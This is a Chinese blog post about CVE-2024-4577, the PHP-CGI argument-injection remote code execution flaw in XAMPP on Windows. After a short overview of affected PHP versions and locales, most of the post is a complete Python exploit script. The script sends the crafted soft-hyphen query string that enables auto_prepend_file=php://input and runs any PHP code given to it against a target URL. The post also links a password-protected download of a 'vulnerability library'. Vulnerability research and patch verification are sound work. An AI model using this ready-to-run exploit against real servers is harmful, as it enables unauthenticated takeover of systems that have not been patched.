XAMPP PHP-CGI 远程代码执行漏洞(CVE-2024-4577)

已于 2024-06-16 12:39:54 修改
阅读量476 收藏 5
点赞数 10
分类专栏: CVE-2024-4577 文章标签: CVE-2024-4577 漏洞 安全威胁分析 php漏洞
于 2024-06-15 16:16:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39190622/article/details/139703931
版权

漏洞概述:

PHP 是一种被广泛应用的开放源代码的多用途脚本语言,PHP-CGI 是 PHP 自带的 FastCGI 管理器。是一个实现了 CGI 协议的程序,用来解释 PHP 脚本的程序,2024 年 6 月 7 日,推特安全上 orange 公开了其漏洞细节,并且 PHP 官方已修复该漏洞。并确认该漏洞在为远程代码执行漏洞,并将其分配编号为 CVE-2024-4577。

XAMPP(Apache+MySQL+PHP+PERL)就是一个功能强大的建站集成软件包,该漏洞在 XAMPP 开启了 PHP-CGI 模式下运行时可造成远程代码执行,攻击者可通过该漏洞获取服务器权限。

该漏洞仅适用于 php 版本为 8.1 < 8.1.29,PHP 8.2 < 8.2.20,PHP 8.3 < 8.3.8,同时在 php-cgi 模式下运行 php,并且运行在 windows 平台,且使用语系为繁体中文 950、日文 932、简体中文 936 等。

威胁等级:

严重

漏洞分类:

远程命令执行

影响资产分类:

应用服务

漏洞复现(POC):

"""
PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC
Discovered by: Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
Exploit By: Aliz (@AlizTheHax0r) and Sina Kheirkhah (@SinSinology) of watchTowr (@watchtowrcyber) 
Technical details: https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/?github
Reference: https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/
Website: https://www.chwm.vip/?CVE-2024-4577
"""

banner = """			 __         ___  ___________                   
	 __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________ 
	 \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
	  \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
	   \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
				  \\/          \\/     \\/                            
	  
        watchTowr-vs-php_cve-2024-4577.py
        (*) PHP CGI Argument Injection (CVE-2024-4577) discovered by Orange Tsai (@orange_8361) of DEVCORE (@d3vc0r3)
          - Aliz Hammond, watchTowr (aliz@watchTowr.com)
          - Sina Kheirkhah (@SinSinology), watchTowr (sina@watchTowr.com)
          - Rainbow (rainbow_nt@hotmail.com)
        CVEs: [CVE-2024-4577]  """


import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import requests
requests.packages.urllib3.disable_warnings()
import argparse

print(banner)
print("(^_^) prepare for the Pwnage (^_^)\n")

parser = argparse.ArgumentParser(usage="""python CVE-2024-4577 --target http://192.168.1.1/index.php -c "<?php system('calc')?>""")
parser.add_argument('--target', '-t', dest='target', help='Target URL', required=True)
parser.add_argument('--code', '-c', dest='code', help='php code to execute', required=True)
args = parser.parse_args()
args.target = args.target.rstrip('/')


s = requests.Session()
s.verify = False



res = s.post(f"{args.target.rstrip('/')}?%ADd+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input", data=f"{args.code};echo 1337; die;" )
if('1337' in res.text ):
    print('(+) Exploit was successful')
else:
    print('(!) Exploit may have failed')
    
print('(*) WebSite https://www.chwm.vip/?CVE-2024-4577')

 

漏洞库: 

https://www.lanzouh.com/b04eghy4f
密码:b8ox

Rainbow Technology
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
0xSec
06-08 2931
2024年6月,PHP官方发布新版本,修复了PHP-CGI中一个远程代码执行漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可获取操作系统权限,建议所有使用受影响版本的企业尽快升级修复,以确保安全
【紧急警示】Locked勒索病毒利用最新PHP远程代码执行漏洞大规模批量勒索!文末附详细加固方案
2401_83062893的博客
06-12 1346
PHP是一门通用开源脚本语言,其语法借鉴吸收C、Java和Perl等流行计算机语言的特点,因此利于学习,使用广泛,主要适用于Web开发领域。XAMPP是最流行的PHP开发环境,XAMPP是完全免费且易于安装的Apache发行版,其中包含MariaDB、PHP和Perl。XAMPP开放源码包的设置让安装和使用出奇容易,它以其广泛的应用范围在本地开发和测试领域备受赞誉。官网地址:https://www.apachefriends.org/zh_cn/index.html。
漏洞复现】CVE-2024-4577PHP CGI Windows平台远程代码执行漏洞
信安百科
06-09 1331
漏洞复现】CVE-2024-4577PHP CGI Windows平台远程代码执行漏洞
漏洞预警丨XAMPPPHP-CGI模式下远程代码执行漏洞(CVE-2024-4577)
C20220511的博客
06-12 511
PHP是一种被广泛应用的开放源代码的多用途脚本语言,PHP-CGIPHP自带的FastCGI管理器。是一个实现了CGI协议的程序,用来解释PHP脚本的程序,2024年6 月7日,推特安全上orange公开了其漏洞细节,并且PHP官方已修复该漏洞。该漏洞仅适用于php版本为8.1 < 8.1.29,PHP 8.2 < 8.2.20,PHP 8.3 < 8.3.8,同时在php-cgi模式下运行php,并且运行在windows平台,且使用语系为繁体中文950、日文932、简体中文936等。
XAMPP远程命令执行漏洞
weixin_46801402的博客
11-02 1187
XAMPP远程命令执行漏洞
网络空间安全赛题解析-通过xampp漏洞获取敏感信息
君逍遥o
06-04 528
XAMPP(Apache+MySQL+PHP+PERL)是一个功能强大的建 XAMPP 软件站集成软件包。这个软件包原来的名字是 LAMPP,但是为了避免误解,最新的几个版本就改名为 XAMPP 了。它可以在Windows、Linux、Solaris、Mac OS X 等多种操作系统下安装使用,支持多语言:英文、简体中文、繁体中文、韩文、俄文、日文等。
漏洞复现-xampp-文件写入】vulfocus/xampp-cve_2013_2586
10-12 1227
xampp-文件写入】写入本地
XAMPP任意命令执行提升权限漏洞CVE-2020-11107) 漏洞加固指南
乐大厨串串香飘万里
10-27 1404
XAMPP任意命令执行提升权限漏洞CVE-2020-11107)漏洞详细。任意命令执行提升权限漏洞CVE-2020-11107)
xampp-control.rar_control_xampp_xampp-control
09-20
压缩包内的文件"xampp-control.exe"很可能是XAMPP Control Panel的可执行程序,用于运行控制台。这个程序提供了直观的界面,允许用户轻松地监控和操作XAMPP环境。通过这个控制面板,你可以: 1. 启动和停止Apache...
xampp-linux-x64-7.2.30-0-installer.run
04-29
linux版本得xamppxampp-linux-x64-7.2.30-0-installer.run
xampp-windows-x64-7.3.10-0-VC15-installer.zip
10-18
XAMPP(Apache+MySQL+PHP+PERL)是一个功能强大的建 XAMPP 软件站集成软件包。包括Apache、MySQL、PHP、PERL,直接解压缩,没有复杂的安装过程,强烈推荐初学者使用。该版本软件为官网下载的官方版本软件,适用于...
xampp-linux-x64-7.3.9.zip
09-25
描述中提到的"xampp-linux-x64-7.3.9-0-installer.run"是一个Linux 64位系统的安装程序,通常为shell脚本格式,用户可以通过运行这个脚本来在CentOS 7系统上安装XAMPP。"官方的下载速度太慢了"可能意味着在官方源...
CVE-2024-4577 PHP-CGI漏洞
最新发布
从小白成长为高级安全专家
06-14 997
CVE-2024-4577 PHP-CGI漏洞分析。有几个点需要了解一下(1)PHP CGI是什么 (2)CVE-2012-1823是什么漏洞 (3)Windows的“Best-Fit”特性是什么?为什么能利用它绕过CVE-2012-1823的修复 (4)PHP CGI重定向配置问题
PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
做自己喜欢的事,并将其发挥到极致!
06-11 1844
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登陆的情况下执行任意PHP代码
vulhub中PDF.js 任意JavaScript代码执行漏洞CVE-2024-4367)
yougexiaojiuguan的博客
06-02 1015
漏洞复现过程的记录
XAMPP任意命令执行提升权限漏洞CVE-2020-11107)
m0_48520508的博客
01-04 1198
0x00简介 XAMPP是一个建站集成软件包,一个易于安装且包含 MySQL、PHP 和 Perl 的 Apache 发行版。类似与WampServer,phpstudy,他可以运行在Wndows、Linux、Mac OS等多种操作。XAMPP 的确非常容易安装和使用:只需下载,解压缩,启动,方便渗透测试人员搭建各种web环境。 0x01漏洞概述 在Windows上的XAMPP 7.2.29之前,7.3.16之前的7.3.x和7.4.4之前的7.4.x中发现了一个问题。非特权用户可以在xampp-cont
CVE-2024-4577PHP CGI 远程代码执行漏洞
qq_21039641的博客
06-08 1813
PHP 语言在设计时忽略Windows 作业系统内部对字元编码转换的Best-Fit特性,导致未认证的攻击者可透过特定的字元序列绕过旧有。的保护,透过参数注入等攻击在远端PHP 服务器上执行任意代码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Rainbow Technology

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值